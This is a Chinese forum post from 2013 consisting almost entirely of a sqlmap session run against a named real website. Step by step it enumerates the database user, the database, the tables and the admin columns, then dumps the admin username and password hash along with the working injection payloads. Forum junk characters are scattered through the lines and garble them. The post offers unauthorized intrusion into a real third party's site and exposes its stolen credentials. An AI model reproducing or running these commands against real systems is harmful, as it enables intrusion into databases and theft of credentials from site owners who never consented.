找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2356|回复: 0
打印 上一主题 下一主题

sqlmap实例注入mysql

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 22:18:49 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
# H" M! N. P$ U+ R* x% pms "Mysql" --current-user       /*  注解:获取当前用户名称2 _$ @! v; n1 H$ {7 b0 K
    sqlmap/0.9 - automatic SQL injection and database takeover tool0 {5 f1 q, k5 P  E
    http://sqlmap.sourceforge.net
  • starting at: 16:53:54. g1 r2 D9 ]3 U, @
    [16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    * ?/ u3 k5 X% t5 {. m session file
    . `* c& ~3 }8 p# O" B! L4 T[16:53:54] [INFO] resuming injection data from session file- m& B& v0 t6 C) Z# ]
    [16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file. G" o$ D; q- K* a- P; V7 B1 V9 ]' s: e
    [16:53:54] [INFO] testing connection to the target url
    ) H& M% G1 R" m" v9 csqlmap identified the following injection points with a total of 0 HTTP(s) reque! X6 G* w" |$ n* X+ h" i
    sts:
    5 c1 b# J& W( C7 q9 ^---
    # l+ X+ j! N. \0 o' b% kPlace: GET
    6 N7 y1 r8 p& J5 m& YParameter: id, n2 m4 V" H2 q8 B
        Type: boolean-based blind1 P6 n$ b! q% `% e0 A
        Title: AND boolean-based blind - WHERE or HAVING clause
    0 y- J" N: m8 ?1 F, Z- ~    Payload: id=276 AND 799=7997 i- L+ ]7 ]/ l; T
        Type: error-based
    0 b& j4 T0 j. }. s8 d6 v  ~- f    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause! Q9 n( N6 ?0 s8 L5 H% t
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,. \; P; @/ G# B) K) G  g
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    ! I) _2 u8 x" p3 U. V),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    0 L1 {5 A5 Y2 x+ f7 Y    Type: UNION query+ V/ I  z9 d3 l1 v& M+ s  k
        Title: MySQL UNION query (NULL) - 1 to 10 columns
    ; x& G! p) `+ y    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
      ]& T' a2 M8 W(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),! \% R" H8 k% t- Q6 N$ ~
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#* i6 e) c6 \1 j7 A* k
        Type: AND/OR time-based blind2 u' H3 \2 j. o- z/ l
        Title: MySQL > 5.0.11 AND time-based blind- e" l# b6 Q) `* u. A( }8 x6 O
        Payload: id=276 AND SLEEP(5)9 H& {: n. {3 o8 b" _
    ---& f; O3 d% s2 g1 y- J1 f
    [16:53:55] [INFO] the back-end DBMS is MySQL
    * r! k0 q1 ?) e) `. t) `7 tweb server operating system: Windows
      m4 L* ?* E' s& N8 Yweb application technology: Apache 2.2.11, PHP 5.3.0
    3 Q- o8 S0 `$ _; s$ Gback-end DBMS: MySQL 5.08 |  a+ W/ Z5 e& z% P) W" T
    [16:53:55] [INFO] fetching current user! r8 A9 R( w1 y, }
    current user:    'root@localhost'   # G3 B7 y" @9 s) L" Y5 h" u  y
    [16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    8 w& f6 H* G  g) Htput\www.wepost.com.hk'
  • shutting down at: 16:53:58% J( C. c8 B$ h8 @4 B% O) ?/ v$ e

    2 d& D5 l, o7 X; d& sD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
      g  H; m) P$ J% ]  _$ l1 b# zms "Mysql" --current-db                  /*当前数据库
    6 z! X. }- p* a2 F/ H$ Y- J    sqlmap/0.9 - automatic SQL injection and database takeover tool
    7 W6 K2 E8 N# D+ ]$ P' a    http://sqlmap.sourceforge.net
  • starting at: 16:54:16
    ; T# ]. T) |3 B& f) }[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    3 h4 i2 r- n# |/ | session file
    ; V  i2 G( n" w/ t[16:54:16] [INFO] resuming injection data from session file
    8 b# N, w0 T* G  R6 {[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    7 k% N8 I8 o  Q* E[16:54:16] [INFO] testing connection to the target url' t7 @" U" B" r  j+ C/ Z8 u
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque( K- I; t" H9 ]
    sts:
      c6 P* f6 _) V/ q( r  H---
      H5 g/ Q- c; r: ?Place: GET
    % s* B/ f$ R' M6 T6 Z3 RParameter: id4 i) o3 w0 Q) H1 g! e% t
        Type: boolean-based blind
    2 `+ {; s$ P. s; Z    Title: AND boolean-based blind - WHERE or HAVING clause
    ; h; O- [3 u1 C    Payload: id=276 AND 799=799# x: S) P5 ?4 w9 K4 e) |: N% ^
        Type: error-based
    3 {+ J) `: n# S) K/ {  y1 R, P    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    & {# t# }1 r$ L8 D- r' d    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    3 P& W6 R8 z2 C- h120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    # }) V0 ]1 l" {),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)1 q$ H+ ?; w. L
        Type: UNION query
    , A! {, {/ @6 r6 L9 J6 W& @' P    Title: MySQL UNION query (NULL) - 1 to 10 columns3 h  y' E/ ]4 g* K6 R& w7 |+ h/ U- Y
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    + n7 W/ U, W( e, R# O% [(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR)," B3 W. N6 Y, V. o( d0 b
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    5 _0 d; T, l: r    Type: AND/OR time-based blind
    ( ]6 Z5 I( a6 q" A1 O: B    Title: MySQL > 5.0.11 AND time-based blind7 p; S  y. z0 w) ]1 F: w
        Payload: id=276 AND SLEEP(5)
    # ]3 p, N3 b  o---
    & S8 g" o+ y# j, M7 @) @[16:54:17] [INFO] the back-end DBMS is MySQL0 X2 l0 _( U( g1 a1 k
    web server operating system: Windows+ ^2 |& z4 B7 G- P
    web application technology: Apache 2.2.11, PHP 5.3.0
    3 B( U. R/ Z" F$ aback-end DBMS: MySQL 5.02 S$ Y" {. m/ v
    [16:54:17] [INFO] fetching current database
    4 x" l5 D( u5 E8 x- Gcurrent database:    'wepost'
    ' p; O$ p3 i0 X$ y7 C6 O[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    8 O3 ]8 f% d0 b+ D9 s! d9 k$ {- atput\www.wepost.com.hk'
  • shutting down at: 16:54:18
    9 o/ q' b8 A, K. M9 GD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db; J, ^; R3 l/ e, Y
    ms "Mysql" --tables  -D "wepost"         /*获取当前数据库的表名
    # g" A" g4 F) z( t    sqlmap/0.9 - automatic SQL injection and database takeover tool
    6 \+ e' E8 M, X# H# O+ c' [    http://sqlmap.sourceforge.net
  • starting at: 16:55:25( K+ P1 R  ]: S9 F1 `' p- n+ G8 H
    [16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as3 c! B* @9 Q: v2 ?: ?
    session file
    - ^, r( }8 Z9 A% d* b# i/ ^+ {[16:55:25] [INFO] resuming injection data from session file5 T1 p1 }/ _) A1 u+ F' i1 Z( B0 S
    [16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    ; _( \5 z. U5 j* D4 W  \( X, Y[16:55:25] [INFO] testing connection to the target url0 ?7 t0 G  K/ ]9 e# T0 W9 m, n
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque
    2 S$ Q# |( }- h  |; C8 M: Wsts:
    9 \; i6 N! I4 m---
    4 o; A- W# H: j, i2 HPlace: GET1 M% E8 Z+ ~& R& L
    Parameter: id9 q/ _( z- C( ^
        Type: boolean-based blind0 A, v# X2 t' |
        Title: AND boolean-based blind - WHERE or HAVING clause% V$ k0 ^; h: W! l. E8 \( y7 m- j
        Payload: id=276 AND 799=799' s+ T& U) Y- U5 ]1 D, \$ U" N
        Type: error-based, A4 p+ B6 \. S' G6 \* w% }" o9 ?
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    . f9 d" B0 e' T/ X6 C4 Z9 c! o    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,1 F$ p1 Z! u0 ?. a7 A6 a9 ?
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58( n% C, n; \! f- K1 ]& C5 y/ l
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)( f. v7 B6 D9 F7 i1 K
        Type: UNION query
    " }5 C" e) E7 k! j    Title: MySQL UNION query (NULL) - 1 to 10 columns( z+ m; Z, b  O. n5 v, c
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    * p7 k8 I; j9 l$ {% S+ d(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),3 V) D% c; O- ^4 u. u5 @4 |5 p: l9 @
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    / b/ q* z: M+ g/ n5 E4 d    Type: AND/OR time-based blind
      f8 \0 K  \0 i$ Q    Title: MySQL > 5.0.11 AND time-based blind
    + F7 {. T$ Z5 B' Q# n    Payload: id=276 AND SLEEP(5)
    2 b% `, r3 e8 C0 V---% v4 h$ e5 ?8 q% H9 K5 V
    [16:55:26] [INFO] the back-end DBMS is MySQL+ {( _3 y' X  Z6 L
    web server operating system: Windows5 q3 R7 p2 D. y' \( l9 u/ J) T
    web application technology: Apache 2.2.11, PHP 5.3.04 P$ E) B0 d7 f" l/ e: r! M' Q6 v
    back-end DBMS: MySQL 5.0
    7 m9 l4 t7 g5 a6 m+ M[16:55:26] [INFO] fetching tables for database 'wepost'7 ~% }5 u2 B% R
    [16:55:27] [INFO] the SQL query used returns 6 entries2 O( s5 `: L' D* S; p7 R
    Database: wepost  {3 }( |  Y/ Z9 W" _$ f( K9 k$ R  w
    [6 tables]
    ( h+ C6 i( V" j2 o5 M5 N+-------------+
    ) f; i& Y8 b/ x" J, _) q9 R| admin       |$ k: J+ D% G. M7 @0 l6 i- {
    | article     |
    3 {- U( ?% S2 {- S- F2 ?$ V8 B& {| contributor |! b6 D4 {5 K9 o/ f
    | idea        |- {& z1 X1 g3 w* D1 n  L
    | image       |
    ) _' @, ^0 c0 i  w& o& h| issue       |* e' g+ w/ e5 M2 X6 h
    +-------------+
    % x8 r* J1 }. w0 v' K, J) j0 G[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    ; v9 \8 @' S$ B/ Ctput\www.wepost.com.hk'
  • shutting down at: 16:55:331 `. r2 b) ^! P$ Z

    , i3 s2 B* d8 a% I" YD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    % }+ K& b+ @0 ?! O' Dms "Mysql" --columns -T "admin" users-D "wepost" -v 0     /*获取admin表的字段名
    4 q9 m) z# p% C( `    sqlmap/0.9 - automatic SQL injection and database takeover tool# \6 o6 p( |9 L& j* l; y0 E  w
        http://sqlmap.sourceforge.net
  • starting at: 16:56:06" u5 d9 v# y) W
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque$ ~& M) E; k  H- n0 L7 N
    sts:1 e* I/ o/ {+ H0 ?( T
    ---1 w; H- d, e; z5 k7 Q
    Place: GET
    , v4 T' R+ V3 E, w! hParameter: id! s# D% \) Y# a8 @' X/ j+ K
        Type: boolean-based blind7 o: a) E1 }* |" g
        Title: AND boolean-based blind - WHERE or HAVING clause
    + L0 K. o5 n7 J/ o1 K: H& k    Payload: id=276 AND 799=799( E3 O4 c' [8 W1 k
        Type: error-based
    . D7 J# i3 s; ~" m& m+ n' W    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    . n# L4 w! @  W" H    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    ) c4 f) \; p5 _8 t& x: \120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58& A# y% O8 d/ |  I# `  M: d) ]
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    3 j/ Q& ^! R! u, e/ b& F    Type: UNION query
    & {# m; U% I9 \6 s2 Q    Title: MySQL UNION query (NULL) - 1 to 10 columns
    3 w$ N  a( H" g1 M( d    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR! A) H$ ~8 [; |/ }: M
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    $ E2 |- w  q9 W- Y4 Q% H2 f7 ^CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    2 c, P" E2 X( d5 `4 |- A$ I5 \    Type: AND/OR time-based blind
    ; O! u8 ?# C; c- f    Title: MySQL > 5.0.11 AND time-based blind2 b3 r  ], g5 C( L& K% Z& y
        Payload: id=276 AND SLEEP(5)9 P- |9 R# W$ `/ u2 s+ B
    ---
      y2 W6 p3 a3 E8 [0 b* ~web server operating system: Windows
    + g$ @3 [4 u$ ^' Y( `9 X4 w1 ~web application technology: Apache 2.2.11, PHP 5.3.01 e7 u' ?+ I1 b" ^: D. G3 d  Y
    back-end DBMS: MySQL 5.03 }! }. J" \" l9 ~
    [16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
    0 B4 t; Y1 T- N: {7 l  Fssion': wepost, wepost. Z. K" B' S) f5 `
    Database: wepost+ G8 G4 K# {: b3 |- `
    Table: admin
    ' x4 m( {2 t4 y) Q+ y[4 columns]
    4 N+ e9 c; A6 n/ U4 ~- i+----------+-------------+3 X) n/ L; p3 t+ X
    | Column   | Type        |9 |2 P/ |% C) z
    +----------+-------------+
    / w9 i) ?" A; J2 e| id       | int(11)     |) ~. u  F- g. E% E. @
    | password | varchar(32) |- {8 K( o! k6 k, t! ^1 y# F& e
    | type     | varchar(10) |+ F5 ~- {  p; D; B" P7 z3 W; i
    | userid   | varchar(20) |
    ; I9 D5 k# f; ~$ _! U: @! E$ K+----------+-------------+
    / _5 n: I/ d6 p7 k" V; ?  N
  • shutting down at: 16:56:19) X+ b0 b5 j# p5 N' m. k. B

    0 P5 Z$ j3 N& _! I- Z* P# TD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db% _+ t; v7 e! u# A! Q# g, ~
    ms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /*获取字段里面的内容, z3 ?( f+ G5 D. l: u0 n+ N% W
        sqlmap/0.9 - automatic SQL injection and database takeover tool& O" u% Y: V1 y* R( R  N2 I
        http://sqlmap.sourceforge.net
  • starting at: 16:57:14( F# }! H; z1 L% t1 _7 q
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque
    ' h( @$ m+ l2 W. i' |sts:
    6 W9 C5 p1 v) l---4 {1 c$ a1 L  o
    Place: GET
      S" l( p, L% e% LParameter: id- Z9 }1 C1 `: H
        Type: boolean-based blind7 T, x& Z7 A# o( s
        Title: AND boolean-based blind - WHERE or HAVING clause. N: C4 q  X1 X% S' l7 U
        Payload: id=276 AND 799=799/ Q9 t9 L$ Z/ G' d% b" q3 [
        Type: error-based! F+ Q* ]1 D/ J; ]6 O
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    6 p# H% w. e  P1 _5 Y* |    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,# e7 ?# t# x8 P+ K: i1 g
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,584 k& w' N3 D6 d7 Y5 X
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    0 k# {& k" W# A, x# {    Type: UNION query
    ! M+ G! G9 S8 M! X    Title: MySQL UNION query (NULL) - 1 to 10 columns) O0 U! F. b5 I4 \: a
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    0 @; q" r( W$ n7 {0 u) h(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),4 Y' b" F. A' S. G7 _& R3 ?  q
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#, f/ G5 o! }6 a
        Type: AND/OR time-based blind
    ) |% I" y4 x' e. L5 R0 g    Title: MySQL > 5.0.11 AND time-based blind9 V3 ^' N1 ~% H& T- a' l
        Payload: id=276 AND SLEEP(5)8 P# S/ B3 \: @9 F
    ---
    - K7 f8 ^/ u1 K* h0 c" gweb server operating system: Windows
    2 N6 W* M/ O% z5 s* O; k  e3 ^8 iweb application technology: Apache 2.2.11, PHP 5.3.0
    9 p( l! V6 N- w8 _3 _/ x! R5 _  J* Eback-end DBMS: MySQL 5.09 E- x% u( P  `* q- m
    recognized possible password hash values. do you want to use dictionary attack o
    2 ^* F/ v: @2 B+ }n retrieved table items? [Y/n/q] y
    3 D/ S7 `; ], E! ?! J9 W$ j2 Iwhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
      f- J: T% \  h7 Y  C% G" m' ^0 jdo you want to use common password suffixes? (slow!) [y/N] y7 @1 y/ k3 ?# ?# k3 m" v& H! O
    Database: wepost
    5 r/ q5 E4 ]4 v" j- A3 cTable: admin
    # o6 `- p9 K+ M" p% h& Y) q[1 entry]
    1 r5 C& b  h* S/ u. e0 F+----------------------------------+------------+; J2 T4 M7 s3 P1 ]: A4 y
    | password                         | userid     |
    / w& n! N) m1 s' Y1 S+----------------------------------+------------+
    . p5 ^; f5 v9 Q& p7 U- g6 s| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
    8 y- [9 ^: c* Y# f. \% k+----------------------------------+------------+
    : x6 \5 X! f7 _! \# ^8 h2 T
  • shutting down at: 16:58:14. u" _  S% \: T9 Z7 A
    1 X% T/ B% D- @, ]9 a1 x
    D:\Python27\sqlmap>
  • 回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    快速回复 返回顶部 返回列表